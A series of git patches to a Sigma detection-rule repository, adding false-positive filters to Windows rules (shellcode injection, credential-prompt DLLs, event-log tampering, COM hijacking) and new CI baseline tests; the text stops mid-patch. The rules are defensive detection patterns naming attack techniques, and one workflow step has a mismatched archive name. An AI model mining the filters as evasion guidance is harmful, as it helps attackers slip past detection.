+18,7 @@ detection: - '.ZZZ' filter_wireshark: TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' - condition: selection + condition: selection and not 1 of filter_* falsepositives: - Legitime usage of SDelete level: medium From a0c3449079acc2e2d460dc2b4af577d1a2daf749 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:59:12 +0200 Subject: [PATCH 078/120] Fix typo --- rules/windows/network_connection/net_connection_win_python.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index bc3737dcb..4d50017c2 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -29,7 +29,7 @@ detection: CommandLine|contains|all: - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' filter_local_communication: - # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 SourceIp: 127.0.0.1 condition: selection and not 1 of filter_* From d9cd98838f6ee552fe5474baec0af8c052575178 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:02:15 +0200 Subject: [PATCH 079/120] Add descriptions --- .../process_access_win_shellcode_inject_msf_empire.yml | 2 +- rules/windows/process_creation/proc_creation_win_mstsc.yml | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index b495e82c8..d9d77b85b 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -48,4 +48,4 @@ detection: condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index 9278e5b04..0fb8cc3ec 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -26,11 +26,13 @@ detection: - ' /u' - ' /p' filter_mstsc_1: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - - Unknown + - WSL (Windows Sub System For Linux) + - Other currently unknown software level: medium tags: - attack.lateral_movement From 7dd2af08e7d48609269482794762d9ba92c8e92a Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:16:15 +0200 Subject: [PATCH 080/120] Update net_connection_win_python.yml --- rules/windows/network_connection/net_connection_win_python.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 4d50017c2..bebc55259 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -26,8 +26,7 @@ detection: # Related to anaconda opening an instance of Jupyter Notebook # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage ParentImage: C:\ProgramData\Anaconda3\python.exe - CommandLine|contains|all: - - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' filter_local_communication: # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 From 4a741290482e16bc0c02f45361f2bee4a920451d Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 13:12:21 +0200 Subject: [PATCH 081/120] Fix after review --- .../image_load/image_load_side_load_antivirus.yml | 10 +++++++--- .../image_load/image_load_susp_python_image_load.yml | 7 ++++--- .../proc_creation_win_susp_codepage_lookup.yml | 8 +++++--- 3 files changed, 16 insertions(+), 9 deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index f2198619d..ce7c17e00 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -6,6 +6,7 @@ references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali, Wietze Beukema (project and research) date: 2022/08/17 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.persistence @@ -19,10 +20,13 @@ detection: # Bitdefender selection_bitdefender: ImageLoaded|endswith: '\log.dll' - filter_bitdefender: + filter_log_dll_bitdefender: ImageLoaded|startswith: - 'C:\Program Files\Bitdefender Antivirus Free\' - 'C:\Program Files (x86)\Bitdefender Antivirus Free\' + filter_log_dll_other: + - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll' + - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\' # F-Secure selection_fsecure: ImageLoaded|endswith: '\qrt.dll' @@ -40,9 +44,9 @@ detection: ImageLoaded|startswith: - 'C:\Program Files\McAfee\' - 'C:\Program Files (x86)\McAfee\' - condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) + condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. - - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 8ddb710a6..9b071a802 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml @@ -3,7 +3,7 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. status: experimental date: 2020/05/03 -modified: 2021/12/05 +modified: 2022/09/21 author: Patrick St. John, OTR (Open Threat Research) tags: - attack.defense_evasion @@ -23,10 +23,11 @@ detection: - Image|startswith: - 'C:\Program Files\' - 'C:\Program Files (x86)\' + - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment condition: selection and not filter fields: - Description falsepositives: - - Legit Py2Exe Binaries - - Known false positive caused with anaconda installation/update + - Legitimate Py2Exe Binaries + - Known false positive caused with Python Anaconda level: medium diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fb9250c74..3e7830ad4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp date: 2022/02/21 -modified: 2022/04/21 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -22,13 +22,15 @@ detection: - 'chcp' - 'chcp ' - 'chcp ' - condition: selection + filter_anaconda: + # This filter will only work with aurora agent enriched data as Sysmon EID 1 and EID 4688 from event log both do not contain GrandparentCommandLine field + GrandparentCommandLine|contains: '/c C:\ProgramData\Anaconda3' + condition: selection and not 1 of filter_* fields: - CommandLine - ParentCommandLine falsepositives: - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section - - Other currently unknown cases level: high tags: - attack.discovery From 4f6d4b7c80086967a6286deb3b066c7ab022303f Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 20 Sep 2022 12:15:04 +0200 Subject: [PATCH 082/120] fix: FP in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 462cceb32..08ad446bf 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/19 +modified: 2022/09/20 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -28,6 +28,7 @@ detection: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From e5e5cdd3b344104960c165337ebe5ce632d08a1d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 20 Sep 2022 14:15:18 +0200 Subject: [PATCH 083/120] workflow: update evtx-baseline to v0.7 and add a new test for the data --- .github/workflows/sigma-test.yml | 20 +++++++++++++++++++- tests/check-baseline-local.sh | 15 +++++++++++++++ 2 files changed, 34 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index f40ccf5ea..60b6cdc96 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy - oscd env: - EVTX_BASELINE_VERSION: v0.6 + EVTX_BASELINE_VERSION: v0.7 jobs: test-sigma: @@ -132,3 +132,21 @@ jobs: ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json - name: Show findings excluding known FPs run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv + check-baseline-win2022-0-20348-azure: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Download evtx-sigma-checker + run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + - name: Download and extract Windows 2022 0 20348 Azure baseline + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348.tgz + - name: Remove deprecated rules + run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' + - name: Check for Sigma matches in baseline + run: | + chmod +x evtx-sigma-checker + ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json + - name: Show findings excluding known FPs + run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 3c849f52d..b3d966d36 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -146,6 +146,18 @@ OS="Windows 11" pids+=($!) PID2OS[$!]=$OS +# Windows 2022.0.20348 Azure +OS="Windows 2022.0.20348 Azure" +{ + wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348-azure.tgz + echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" + ./evtx-sigma-checker --log-source "${SIGMA}"/tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ > findings-win2022-0-20348-azure.json + echo " Finished Checking for Sigma matches in $OS baseline" +}& +pids+=($!) +PID2OS[$!]=$OS + # Sync with all background jobs for pid in ${pids[*]}; do echo "===> Waiting for PID $pid / ${PID2OS[$pid]}" @@ -171,6 +183,9 @@ echo "Windows 2022:" echo echo "Windows 2022 AD:" "${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-ad.json "${SIGMA}"/.github/workflows/known-FPs.csv +echo +echo "Windows 2022.0.20348 Azure:" +"${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json "${SIGMA}"/.github/workflows/known-FPs.csv echo read -p "Removing temporary directory ${TMP}. Press Enter to continue." -s From 40e0dfcb292457b784cfe93c1a84d35979dbbfed Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:38:10 +0200 Subject: [PATCH 084/120] chore: add new known FPs --- .github/workflows/known-FPs.csv | 11 +++++++---- tests/check-baseline-local.sh | 4 ++++ 2 files changed, 11 insertions(+), 4 deletions(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index e29877a27..a22dafcd5 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen +1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml -8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC +8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon) 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_ 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0 -162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe -cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241 -bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223 +162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe +cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241 +bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;target\.exe 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe @@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$ 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6 +734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe @@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index b3d966d36..1c9bae2f7 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -113,6 +113,7 @@ PID2OS[$!]=$OS # Windows 10 OS="Windows 10" { + sleep 10 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz tar xzf win10-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -125,6 +126,7 @@ PID2OS[$!]=$OS # Windows 2022 AD OS="Windows 2022 AD" { + sleep 20 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz tar xzf win2022-ad.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -137,6 +139,7 @@ PID2OS[$!]=$OS # Windows 11 OS="Windows 11" { + sleep 30 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz tar xzf win11-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" @@ -149,6 +152,7 @@ PID2OS[$!]=$OS # Windows 2022.0.20348 Azure OS="Windows 2022.0.20348 Azure" { + sleep 40 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz tar xzf win2022-0-20348-azure.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" From b7f20b884c8630aac5a6ce9ef379999e0711c9e1 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:39:24 +0200 Subject: [PATCH 085/120] fix: FPs from new evtx-baseline --- .../windows/dns_query/dns_query_win_susp_ldap.yml | 11 +++++++---- ...le_event_win_susp_teamviewer_remote_session.yml | 4 ++-- .../image_load_uipromptforcreds_dlls.yml | 7 +++++-- .../posh_pm_alternate_powershell_hosts.yml | 6 ++++-- .../proc_creation_win_ntfs_short_name_use_cli.yml | 5 +++-- .../proc_creation_win_susp_regsvr32_anomalies.yml | 4 ++-- ...y_delete_removal_com_hijacking_registry_key.yml | 9 +++++++++ .../registry_event_susp_atbroker_change.yml | 10 +++++++--- ...sep_reg_keys_modification_currentcontrolset.yml | 9 ++++++++- ...t_asep_reg_keys_modification_currentversion.yml | 14 +++++++++++--- ..._set_asep_reg_keys_modification_wow6432node.yml | 5 ++++- .../registry_set_persistence_search_order.yml | 7 ++++++- .../registry_set_servicedll_hijack.yml | 4 +++- .../registry_set/registry_set_sip_persistence.yml | 7 ++++++- .../registry_set_susp_printer_driver.yml | 8 ++++++-- .../windows/sysmon/sysmon_config_modification.yml | 2 +- 16 files changed, 84 insertions(+), 28 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index 5f0998042..8acfb3fce 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -1,9 +1,9 @@ -title: Suspicious Ldap Domain Access +title: Suspicious LDAP Domain Access id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e -description: Detect suspicious ldap request from non Windows application +description: Detect suspicious LDAP request from non-Windows application status: experimental date: 2022/08/20 -modified: 2022/09/18 +modified: 2022/09/21 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -16,7 +16,10 @@ detection: filter_windows: Image|startswith: 'C:\Windows\' filter_defender: - Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + Image|startswith: + - 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + - 'C:\Program Files\Windows Defender\MsMpEng.exe' + - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe' Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' diff --git a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml index 8d6fd06ce..bc6e34bd4 100644 --- a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml +++ b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml @@ -14,11 +14,11 @@ logsource: category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '\TeamViewer\RemotePrinting\tvprint.db' - '\TeamViewer\TVNetwork.log' selection2: - TargetFilename|contains|all: + TargetFilename|contains|all: - '\TeamViewer' - '_Logfile.log' condition: 1 of selection* diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index a9e409fd4..eac2f40fa 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/09/20 +modified: 2022/09/21 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access @@ -31,7 +31,10 @@ detection: - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: - Image|endswith: '\opera_autoupdate.exe' + Image|endswith: + - '\opera_autoupdate.exe' + - '\procexp64.exe' + - '\procexp.exe' filter_full: Image: - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 317ce299b..3f7989312 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/09/18 +modified: 2022/09/20 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html @@ -26,7 +26,9 @@ detection: filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' filter_help_update: - Payload|contains: 'Update-Help' + Payload|contains: + - 'Update-Help' + - 'Failed to update Help for the module' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml index 4158116e8..3f75f2dfd 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/05 -modified: 2022/08/12 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -37,9 +37,10 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index 7cb98a4f5..3bd4048a7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/09/18 +modified: 2022/09/21 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -74,7 +74,7 @@ detection: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' filter_legitimate: - CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' + CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 6b6ec4ec7..71184d34b 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -35,6 +35,15 @@ detection: Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) TargetObject|contains: '\wireshark-capture-file\' + filter_opera: + Image|startswith: + - 'C:\Program Files\Opera\' + - 'C:\Program Files (x86)\Opera\' + Image|endswith: '\installer.exe' + filter_peazip: + Image|contains: 'peazip' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|startswith: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index 23cc3a56b..f3cb1b87c 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2022/09/18 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.t1218 @@ -21,7 +21,11 @@ detection: TargetObject|contains: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs' - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' - condition: selection + filter: + Image: 'C:\Windows\system32\atbroker.exe' + TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' + Details: '(Empty)' + condition: selection and not filter falsepositives: - Creation of non-default, legitimate at usage level: medium diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index 8a935e286..608a3071b 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 